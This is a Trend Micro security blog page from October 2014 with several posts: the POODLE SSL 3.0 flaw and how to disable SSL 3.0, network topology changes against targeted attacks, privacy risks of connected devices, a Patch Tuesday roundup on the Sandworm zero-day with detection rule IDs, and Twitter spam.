Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    October 2014
    S M T W T F S
    « Sep    
  • About Us

    Earlier today, Google researchers Bodo Möller, Thai Duong, and Krzysztof Kotowicz released a paper discussing a serious bug in SSL 3.0 that allows attackers to conduct man-in-the-middle attacks and decrypt the traffic between Web servers and end users.

    For example, if you’re shopping online with your credit card, you may think that your information is secure but thanks to this bug (known as POODLE) it may actually be at risk. An attacker can hijack your transaction, retrieve your credit card information, or even change your order.

    The bullet points below summarize some key points of this vulnerability:

    • CVE ID: CVE-2014-3566
    • Popular name: POODLE (Padding Oracle On Downgraded Legacy Encryption)
    • Vulnerabilty: SSL 3.0 fallback bug
    • Attack vector: Man-in-the-middle

    How does the POODLE attack work?

    According the paper, the key issue is the integrity of the padding on SSL 3.0 block ciphers. This padding is not verified by the protocol. This will allow an attacker to alter the final block of the SSL cipher if the hacker can successfully hijack the connection from an end user to the Web server. This can lead to the attacker being able to successfully decrypt any encrypted traffic that they are able to capture.

    SSL 3.0 is an older encryption protocol that has been around for 15 years. It has been succeeded by TLS (which is now at version 1.2). However, TLS clients and servers will downgrade to earlier versions of the protocol if one side of the transaction does not support the latest version.

    Consider the example below. The browser supports version of TLS up to 1.2. In the first handshake, the browser uses the highest protocol version (TLS 1.2) that it supports. If that handshake fails, the browser will retry with earlier versions (TLS 1.1, then TLS 1.0). The attacker then will make it so the browser will downgrade versions up to SSL 3.0, at which point the POODLE vulnerability can then be exploited to decrypt any communications between the two parties.

    Sniffer 2-01

    Figure 1:  Attackers may force the communication between a client and server to downgrade from TLS to SSL 3.0 to be able to decrypt the network communication


    This vulnerability can be avoided if the SSL 3.0 protocol is disabled. Site administrators can disable support for this on their side; for example these instructions show how to do this in Apache.

    End users can disable SSL 3.0 support on their end as well, through the following steps:

    • For Chrome users, running Chrome with the command Chrome.exe  –ssl-version-min=tls1 will specify that the minimum version of SSL that will be used is TLS 1.0.
    • In Firefox, type about:config in the search bar to change settings. Search for the keyword security.tls.version.min and set the value to 1 to disable SSL 3.0 support.
    • Internet Explorer users can follow the steps in Security Advisory 3009008 to disable SSL 3.0

    For enterprises they can do server patch via the following steps:

    Note, however, that disabling SSL3.0 is not a practical step for all users, especially since it can still be needed to work with legacy systems. The security advisory from recommended the usage of TLS_FALLBACK_SCSV mechanism to web servers, to ensure that SSL 3.0 is used only when necessary (when a legacy implementation is involved). This way, attackers can no longer force a protocol downgrade.

    We will continue to proactively monitor for threats that use this vulnerability and provide updates and solutions as necessary.

    Update as of 1:48 PM, October 15, 2014

    Trend Micro Deep Security customers are protected from attacks that may leverage POODLE vulnerability via the following DPI rules:

    • 1006293 – Detected SSLv3 Request
    • 1006296 – Detected SSLv3 Response
    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    When it comes to targeted attacks, attackers are not omniscient. They need to gather information in the early stages to know the target they may gather information from various sources of intelligence, like Google, Whois, Twitter, and Facebook. They may gather data such as email addresses, IP ranges, and contact lists. These will then be used as lure for phishing emails, which inevitably result in gaining access in the targeted organization’s network.

    Once inside, the attackers will begin the lateral movement stage. In this stage, attackers will perform port scans, services scans, network topology mapping, password sniffing, keylogging, and security policy penetration tests. The goal is to find more confidential information and find a stealthy method of access.

    The lateral movement allows the attackers information they can then use to their advantage. They are now aware of existing security weak points, firewall rule setting flaws, and the wrong security equipment deployment. They also now have the latest network topology, password sets, and security policies.

    They can use this newfound knowledge even after their attempts have been discovered. Often times, efforts to thwart existing and prevent new attacks involve removing the malware and monitoring for network activity. But since attackers are aware of the topology, they can try new ways to gain access easily without being noticed.

    Earlier, we posted an entry detailing how IT administrators can protect enterprises from targeted attacks and breaches via looking at their network vulnerabilities.  In this blog post, we want to tackle how network topology can aid in defending the enterprise network from risks pose by targeted attacks.

    Changing the Network Topology

    It’s not enough to change passwords and remove the malware. To protect an organization from targeted attacks, changing the network topology should also be considered.

    Network topology refers to how devices are connected within a network, both physically and logically. The term refers to all devices connected to a network, be it the computers, the routers, or the servers. Since it also refers to how these devices are connected, network topology also includes passwords, security policies, and the like.

    If the targeted organization changes the network topology, the attackers’ gained knowledge will become useless to their attacks. If the threat actors attempt to enter the network using the old method, it will be flagged by the new(er) security policies put in place. Changes like moving the “location” of the target data or moving segments will require a longer period of time for attackers to find the targeted data. This length of time can prove invaluable as it can give admins more time to detect the malicious activity before any real damage can be done.


    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    I prefer using the phrase “Internet of Everything” when discussing what most people call the Internet of Things because in many ways, the latter term isn’t enough. What makes the Internet of Everything so powerful is the data about you and me that these devices can gather.

    Consider how these devices actually work. They almost always need to “phone home” to some central server run by the service provider. This means that anything that you do on the device is seen by the provider. You have to trust that they will keep your data secure and not misuse it or neglect it over time.

    Unfortunately, there are many ways your data can be misused or compromised. For example, the devices themselves can be insecure and be compromised by an attacker. The modules that are used by these devices, likely borrowed from open source, are susceptible to exploitation over time, and the vendor may not have thought too much about how to get them quickly and seamlessly updated. The servers themselves can be compromised and breached in a targeted attack.

    This doesn’t even enter into what the service provider can do with your data. You don’t really realize the extent of the data that an IoE device can take until you read the privacy policy. These policies, however, are difficult to comprehend, and may change over time without any notification to the consumer.

    Privacy policies will at least be able to say what data is collected, but in general they don’t disclose the full reality of what can be done with your information. As an example, many will have provisions stating that the data will be used to deliver the services provided. In practice, this broad generalization can be used as a legal basis to justify many different ways to use and possibly exploit your data.

    So, what should users do? Before purchasing an Internet-connected hardware device, make sure that you are comfortable with the fact that any data you provide them with, could potentially be stored on unsecured servers in data centers situated in different countries, over a long period of time. Your personal “data at rest” on the manufacturer’s servers represent an increased risk to you over time. Some risks include the possibility of data breaches, sharing or reselling of your data, along with general neglect of the data in scenarios such as company security lapses, or events such as sale or merger of the company.

    If you’re the type of consumer who is concerned about privacy, it is recommended that you should find out what type of data (personal identifiable information, user credentials etc.) is being gathered on the device and sent to the vendor by inquiring to the sales/support of the vendor. And if you’re considering different service providers for the same kind of service, compare their privacy policies and see which one you feel comfortable with. Reviewing the privacy policy is a good start to make you aware of what they may be doing with your data.

    Consider, too that many startup funded companies may not have fleshed out their business model yet. Your data is a key part of how they may be initially, or additionally monetize the service that they provide. These pressures can result in the misuse of your data. One could argue that a company that is charging more for their service up front would be less prone to attempt to monetize further employing your data, but again there is no guarantee — data is a key element of IoE. A more reputable company that has a brand to protect may be a better choice, though this neither is fully guaranteed as well. An example is the recent gleaning of data from USB drives plugged into LG TVs.

    To know more on how to be safe in the Internet of Everything, read our “Security Considerations for Consumers Buying Smart Home Devices,” which can guide you in making decisions on the Internet connected devices you introduce into your daily life.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    Three out of nine security bulletins in today’s Microsoft Patch Tuesday are marked as Critical while the rest are tagged as Important The patches address vulnerabilities found in Internet Explorer, and Microsoft .NET Framework, including the zero-day exploit affecting Microsoft Windows. MS14-060 discusses the Sandworm zero-day vulnerability, which was reported hours earlier.

    Based on our analysis, attackers may use this vulnerability to create/execute malware payloads, given that it not too difficult to exploit. Attackers can just know the format and create their own PowerPoint exploit. Trend Micro detects the exploit as TROJ_MDLOAD.PGTY, and its payloads as INF_BLACKEN.A and BKDR_BLACKEN.A. Currently, it is believed that this zero-day was used in cyber attacks against European sectors and industries.

    Another critical vulnerability that users need to note is MS14-056 which fixes several vulnerabilities in Internet Explorer. Once successfully exploited, this could possibly lead to remote code execution. Similarly, MS14-057, another bulletin tagged as Critical could lead to remote code execution when successfully exploited by remote attackers.

    Adobe also released security updates today to address vulnerabilities affecting certain versions of ColdFusion and Adobe Flash Player. These are covered under the following CVEs:

    • CVE-2014-0558
    • CVE-2014-0564
    • CVE-2014-0569
    • CVE-2014-0570
    • CVE-2014-0571
    • CVE-2014-0572

    We highly recommend users to patch their systems and update their Adobe products to its latest versions. The Sandworm zero-day highlights the importance of patching as this can be used by cybercriminals and threat actors to infiltrate the network and potentially steal confidential company data and other type of information.

    Trend Micro Deep Security and Office Scan with the Intrusion Defense Firewall (IDF) plugin protect user systems from threats that may leverage these vulnerabilities following DPI rules:

    • 1006267 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4126)
    • 1006268 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4127)
    • 1006269 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4128)
    • 1006270 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4129)
    • 1006271 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4130)
    • 1006282 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4132)
    • 1006274 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4133)
    • 1006279 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4134)
    • 1006273 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-4138)
    • 1006283 - Microsoft Word And Office Web Apps Remote Code Execution Vulnerability (CVE-2014-4117)
    • 1000552 - Generic Cross Site Scripting(XSS) Prevention
    • 1006290 - Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114)
    • 1006291 - Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-4114) – 1

    Users may visit our Threat Encyclopedia page for more details on these security bulletins.

    Update as of October 16, 2014, 5:45 P.M.:

    The Sandworm vulnerability has been linked to attacks against specific SCADA systems. Read more about this in our post titled Sandworm to Blacken: The SCADA Connection.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  

    In the two previous parts of this series of blog posts, we discussed the kinds of threats that we’re seeing on Twitter, as well as the scope and scale of these threats. In this part, we will discuss their motivations, and what end users can do.

    The first question is: why do cybercriminals bother doing this? Social media accounts are valuable in their own right. These accounts can typically be used to make money in many ways for cybercriminals; any form of personally identifiable information (PII) can be monetized by attackers.

    One way that stolen social media accounts are used is to send spam. One reason that social media spam can be considered superior to email spam is simple: more people click on links from social media than email. The click-through rate for email spam is estimated at anywhere from 0.003% to 0.02%. How does Twitter spam fare?

    It’s difficult to exactly compare numbers for the effectiveness of Twitter spam with those for e-mail spam. One measure we can use is the number of clicks we saw for every spammed Tweet. This varies depending on the type of abuse. Some Twitter spam campaigns could be spectacularly successful: one viral campaign aimed at Japanese users had a 0.269 clicks per Tweet. However, more typical rates varied from 0.01 clicks per Tweet for Twitter-specific spam to 0.03 for malware-linked Tweets. These numbers suggest that Twitter spam is more effective than conventional email spam.

    So now we’ve established that Twitter spam is a legitimate threat. How is Twitter responding? We are happy to say that this is a problem Twitter is getting on top of. Earlier this year, they disclosed the existence of BotMaker, their anti-spam bot infrastructure which has cut the spam problem by 40%. Other social networks can study Twitter as an example in how to deal with threats on their sites.

    For users, the lessons are clearer. First of all, do not believe any claims that you can buy followers/views/likes/friends/etcetera. The numbers you buy will almost certainly come from compromised accounts. This will bring no, or even negative value, towards your own social media efforts. Your own account may also be compromised in the process. Shortcuts to social media popularity don’t exist.

    Secondly, you should already be careful about clicking on links posted on social media in general, but be particularly careful about links that say that you have to log in again because your original log in timed out. Close your browser and start again; if you see the same message it’s almost certainly a phishing page.

    Lastly, if the social media services you use support it, turn on two-factor authentication. Just about all large online services today offer some support for two-factor authentication. Turning it on makes compromising your account much harder, as an attacker has to somehow compromise your phone as well. It’s not impossible – other Trend Micro research has shown how this can be done with online banking. However, it is still a useful security precaution to take against most attacks targeting social media.

    Email this story to a friend   Technorati   NewsVine   MySpace   Google   Live   StumbleUpon  


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice